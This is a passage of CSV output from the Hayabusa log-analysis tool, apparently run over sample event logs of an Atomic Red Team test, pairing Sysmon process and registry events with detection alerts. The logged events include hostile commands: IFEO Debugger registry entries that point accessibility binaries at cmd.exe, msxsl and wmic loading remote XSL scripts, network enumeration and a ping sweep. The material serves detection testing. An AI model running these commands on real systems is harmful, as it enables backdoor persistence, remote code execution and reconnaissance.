747F3D96-D8A9-5D31-0000-0010C0C63200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 5124 | PGUID: 
747F3D96-D8A9-5D31-0000-0010C0C63200,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,../hayabusa-rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:18.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6016 | PGUID: 747F3D96-D8AA-5D31-0000-0010C0C93200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:19.467 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6244 | PGUID: 747F3D96-D8AB-5D31-0000-001054D03200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:19.491 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image 
File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 5632 | PGUID: 747F3D96-D8AB-5D31-0000-0010A5D23200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:19.516 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 5632 | PGUID: 747F3D96-D8AB-5D31-0000-0010A5D23200,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:19.516 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:19.549 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1888 | PGUID: 747F3D96-D8AB-5D31-0000-0010A4D53200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:25.376 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon 
Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49727 (MSEDGEWIN10.home) | Dst: 172.217.17.132:80 (ams15s30-in-f4.1e100.net) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:25.376 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:50.046 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Temp\msxsl.exe C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4004 | PGUID: 747F3D96-D8CA-5D31-0000-0010DA413300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:50.086 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6268 | PGUID: 747F3D96-D8CA-5D31-0000-0010CF443300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:53.011 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Temp\msxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 948 | PGUID: 747F3D96-D8CC-5D31-0000-001038513300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:53.062 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1852 | PGUID: 747F3D96-D8CD-5D31-0000-001047543300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:55.991 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:list"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5380 | PGUID: 747F3D96-D8CF-5D31-0000-00109B603300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:56.047 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: wmic.exe process /FORMAT:list | Process: C:\Windows\System32\wbem\WMIC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:list"" | LID: 0x50951 | PID: 7040 | PGUID: 747F3D96-D8D0-5D31-0000-0010F3623300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:56.047 +09:00,MSEDGEWIN10,1,medium,Exec,Suspicious WMI Reconnaissance,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmic_reconnaissance.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:56.182 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 396 | PGUID: 747F3D96-D8D0-5D31-0000-001034673300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:06.728 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5340 | PGUID: 747F3D96-D8DA-5D31-0000-0010D3833300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl | Process: C:\Windows\System32\wbem\WMIC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl"" | LID: 0x50951 | PID: 3220 | PGUID: 747F3D96-D8DA-5D31-0000-001029863300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,Evas | Exec,SquiblyTwo,,../hayabusa-rules/sigma/process_creation/proc_creation_win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,Exec,Suspicious WMI Reconnaissance,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmic_reconnaissance.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,Evas,XSL Script Processing,,../hayabusa-rules/sigma/process_creation/proc_creation_win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:06.888 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4016 | PGUID: 747F3D96-D8DA-5D31-0000-00100D8A3300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:09.823 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""net view /domain"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4856 | PGUID: 747F3D96-D8DD-5D31-0000-0010EF923300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: net view /domain | Process: C:\Windows\System32\net.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""net view /domain"" | LID: 0x50951 | PID: 3012 | PGUID: 747F3D96-D8DD-5D31-0000-001043953300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,low,Disc,Windows Network Enumeration,,../hayabusa-rules/sigma/process_creation/proc_creation_win_net_enum.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,low,Disc | LatMov,Net.exe Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:22.314 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""net view"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1988 | PGUID: 747F3D96-D8EA-5D31-0000-001030B63300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: net view | Process: C:\Windows\System32\net.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""net view"" | LID: 0x50951 | PID: 4684 | PGUID: 747F3D96-D8EA-5D31-0000-00108AB83300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,low,Disc,Windows Network Enumeration,,../hayabusa-rules/sigma/process_creation/proc_creation_win_net_enum.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,low,Disc | LatMov,Net.exe Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:34.797 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3344 | PGUID: 747F3D96-D8F6-5D31-0000-00100FCB3300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:35.014 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %%i in (1,1,254) do ping -n 1 -w 100 192.168.1.%%i"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4528 | PGUID: 747F3D96-D8F6-5D31-0000-001091D13300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:35.038 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.1 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3876 | PGUID: 747F3D96-D8F7-5D31-0000-0010EDD33300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:35.579 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.2 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2084 | PGUID: 747F3D96-D8F7-5D31-0000-0010E3D83300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:35.988 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.3 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3068 | PGUID: 747F3D96-D8F7-5D31-0000-0010A7E13300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:36.549 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.4 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4376 | PGUID: 747F3D96-D8F8-5D31-0000-00108FE43300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:37.034 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.5 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3116 | PGUID: 747F3D96-D8F9-5D31-0000-00108BE73300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:37.513 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.6 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3868 | PGUID: 747F3D96-D8F9-5D31-0000-001073EA3300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:38.020 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.7 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1020 | PGUID: 747F3D96-D8FA-5D31-0000-00105BED3300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:38.517 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.8 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2292 | PGUID: 747F3D96-D8FA-5D31-0000-001043F03300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:39.028 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.9 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3612 | PGUID: 747F3D96-D8FB-5D31-0000-00108BF33300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:39.537 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.10 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5852 | PGUID: 747F3D96-D8FB-5D31-0000-001073F63300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:40.027 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.11 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2412 | PGUID: 747F3D96-D8FC-5D31-0000-001070F93300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:40.431 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.12 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3736 | PGUID: 747F3D96-D8FC-5D31-0000-00105AFC3300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:41.066 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.13 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1720 | PGUID: 747F3D96-D8FD-5D31-0000-0010650E3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:41.408 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.14 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D8FD-5D31-0000-00104F113400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:41.894 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.15 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4588 | PGUID: 747F3D96-D8FD-5D31-0000-001039143400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:42.466 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.16 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1880 | PGUID: 747F3D96-D8FE-5D31-0000-001023173400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
